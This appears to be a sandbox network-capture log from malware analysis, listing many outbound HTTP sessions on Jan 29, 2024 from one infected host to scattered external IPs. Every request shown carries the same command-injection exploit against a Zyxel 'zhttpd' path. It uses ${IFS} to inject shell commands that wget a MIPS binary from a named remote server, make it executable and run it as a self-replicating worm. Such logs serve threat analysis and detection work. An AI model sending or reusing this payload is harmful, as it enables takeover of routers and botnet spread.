                                              Jan 29, 2024 07:04:05.314137936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8056192.168.2.1460916128.157.202.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314167976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8057192.168.2.1451042156.83.100.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314214945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8058192.168.2.14367548.252.211.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314270020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8059192.168.2.1442600137.51.19.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314327955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8060192.168.2.144740239.52.31.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314354897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8061192.168.2.143724047.170.27.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314392090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8062192.168.2.143962263.182.254.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314434052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8063192.168.2.1440220110.187.3.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314482927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8064192.168.2.1447996146.55.138.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314507008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8065192.168.2.1457324103.111.75.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314537048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8066192.168.2.143841651.178.200.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314579010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8067192.168.2.143504452.133.23.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314621925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8068192.168.2.1450916192.243.253.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314663887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8069192.168.2.143383682.48.46.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314702988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8070192.168.2.1439394138.22.63.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314728975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8071192.168.2.146066878.17.190.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314778090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8072192.168.2.1435090164.162.179.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314806938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8073192.168.2.1458790175.73.98.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314846992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8074192.168.2.144172446.144.178.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314888000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8075192.168.2.144245497.211.207.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314919949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8076192.168.2.145036857.122.128.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314954042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8077192.168.2.143607257.142.168.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315013885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8078192.168.2.1453644144.181.239.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315047026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8079192.168.2.1433456115.90.230.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315094948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8080192.168.2.146071894.128.230.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315128088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8081192.168.2.145762084.50.176.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315176964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8082192.168.2.1434792157.218.176.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315200090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8083192.168.2.1451046197.226.214.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315249920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8084192.168.2.145981072.138.39.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315280914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8085192.168.2.144357237.101.252.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315354109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8086192.168.2.14585728.105.3.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315388918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8087192.168.2.1457888222.96.25.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315423965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8088192.168.2.1435704147.137.88.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315474987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8089192.168.2.1441462213.150.47.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315495968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8090192.168.2.1449336130.89.129.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315545082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8091192.168.2.145952224.228.230.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315566063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8092192.168.2.144739098.238.165.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315610886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8093192.168.2.144836261.165.92.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315659046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8094192.168.2.143381898.121.223.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315715075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8095192.168.2.1452334185.11.170.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315738916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8096192.168.2.1453260102.255.74.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315777063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8097192.168.2.144212282.229.53.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315805912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8098192.168.2.143493063.127.122.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315861940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8099192.168.2.1457150152.23.135.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315876961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8100192.168.2.146060668.230.57.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315898895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8101192.168.2.144825860.187.189.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315960884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8102192.168.2.145031499.237.126.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.315998077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8103192.168.2.1447584120.119.44.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316035986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8104192.168.2.145054420.66.134.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316083908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8105192.168.2.1433634145.243.231.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316127062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8106192.168.2.1433352210.150.148.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316164970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8107192.168.2.145858460.98.145.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316215038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8108192.168.2.1449916101.89.14.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316262960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8109192.168.2.1434452124.28.236.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316297054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8110192.168.2.1456890123.213.61.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316323996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8111192.168.2.1454258213.50.44.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316350937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8112192.168.2.143319461.153.40.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316369057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8113192.168.2.14362368.159.215.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316431999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8114192.168.2.145515862.20.108.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316456079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8115192.168.2.145762491.91.237.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316502094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8116192.168.2.143966617.146.35.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316543102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8117192.168.2.1449714104.115.35.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316570044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8118192.168.2.1459074143.142.182.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316611052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8119192.168.2.1449766131.230.36.13443
                                              TimestampBytes transferredDirectionData
